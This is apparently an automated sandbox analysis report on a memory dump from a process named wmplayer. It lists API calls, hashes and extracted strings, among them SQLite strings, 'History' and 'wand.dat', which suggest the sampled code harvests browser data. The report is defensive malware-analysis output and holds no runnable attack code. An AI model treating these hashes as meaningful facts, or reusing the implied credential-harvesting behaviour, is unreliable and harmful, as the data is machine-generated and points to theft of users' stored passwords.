                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: foreign key constraint failed$new$oid$old
                                                                                            • API String ID: 0-1953309616
                                                                                            • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                            • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                            • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                            • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                            APIs
                                                                                            Strings
                                                                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                            • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                            • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                            • API String ID: 3510742995-272990098
                                                                                            • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                            • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                            • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                            • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0044A6EB
                                                                                            • memset.MSVCRT ref: 0044A6FB
                                                                                            • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID: gj
                                                                                            • API String ID: 1297977491-4203073231
                                                                                            • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                            • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                            • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                            • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                            APIs
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                            • free.MSVCRT ref: 0040E9D3
                                                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$free
                                                                                            • String ID:
                                                                                            • API String ID: 2241099983-0
                                                                                            • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                            • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                            • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                            • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                            APIs
                                                                                            • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                            • malloc.MSVCRT ref: 004174BD
                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                            • free.MSVCRT ref: 004174E4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                            • String ID:
                                                                                            • API String ID: 4053608372-0
                                                                                            • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                            • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                            • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                            • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                            APIs
                                                                                            • GetParent.USER32(?), ref: 0040D453
                                                                                            • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                            • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Rect$ClientParentPoints
                                                                                            • String ID:
                                                                                            • API String ID: 4247780290-0
                                                                                            • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                            • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                            • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                            • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                            APIs
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                            • memset.MSVCRT ref: 004450CD
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                              • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                            • String ID:
                                                                                            • API String ID: 1471605966-0
                                                                                            • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                            • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                            • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                            • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                            APIs
                                                                                            • wcscpy.MSVCRT ref: 0044475F
                                                                                            • wcscat.MSVCRT ref: 0044476E
                                                                                            • wcscat.MSVCRT ref: 0044477F
                                                                                            • wcscat.MSVCRT ref: 0044478E
                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                              • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                              • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                            • String ID: \StringFileInfo\
                                                                                            • API String ID: 102104167-2245444037
                                                                                            • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                            • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                            • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                            • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                            • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                            • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                            • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _memicmpwcslen
                                                                                            • String ID: @@@@$History
                                                                                            • API String ID: 1872909662-685208920
                                                                                            • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                            • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                            • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                            • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004100FB
                                                                                            • memset.MSVCRT ref: 00410112
                                                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                            • _snwprintf.MSVCRT ref: 00410141
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                            • String ID: </%s>
                                                                                            • API String ID: 3400436232-259020660
                                                                                            • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                            • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                            • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                            • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040D58D
                                                                                            • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                            • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ChildEnumTextWindowWindowsmemset
                                                                                            • String ID: caption
                                                                                            • API String ID: 1523050162-4135340389
                                                                                            • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                            • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                            • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                            • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                            APIs
                                                                                              • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                              • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                            • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                            • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                            • String ID: MS Sans Serif
                                                                                            • API String ID: 210187428-168460110
                                                                                            • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                            • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                            • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                            • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                            • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                            • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                            • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                            • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memcmp
                                                                                            • String ID:
                                                                                            • API String ID: 3384217055-0
                                                                                            • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                            • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                            • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                            • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$memcpy
                                                                                            • String ID:
                                                                                            • API String ID: 368790112-0
                                                                                            • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                            • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                            • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                            • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                            APIs
                                                                                              • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                            • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                            Strings
                                                                                            • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                            • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                            • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                            • API String ID: 1297977491-2063813899
                                                                                            • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                            • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                            • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                            • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040560C
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                              • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                            • String ID: *.*$dat$wand.dat
                                                                                            • API String ID: 2618321458-1828844352
                                                                                            • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                            • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                            • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                            • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00412057
                                                                                              • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                            • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                            • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                            • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                            • String ID:
                                                                                            • API String ID: 3550944819-0
                                                                                            • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                            • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                            • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                            • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                            APIs
                                                                                            • free.MSVCRT ref: 0040F561
                                                                                            • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                            • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$free
                                                                                            • String ID: g4@
                                                                                            • API String ID: 2888793982-2133833424
                                                                                            • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                            • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                            • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                            • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                            • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: @
                                                                                            • API String ID: 3510742995-2766056989
                                                                                            • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                            • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                            • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                            • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004144E7
                                                                                              • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                              • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                            • memset.MSVCRT ref: 0041451A
                                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 1127616056-0
                                                                                            • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                            • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
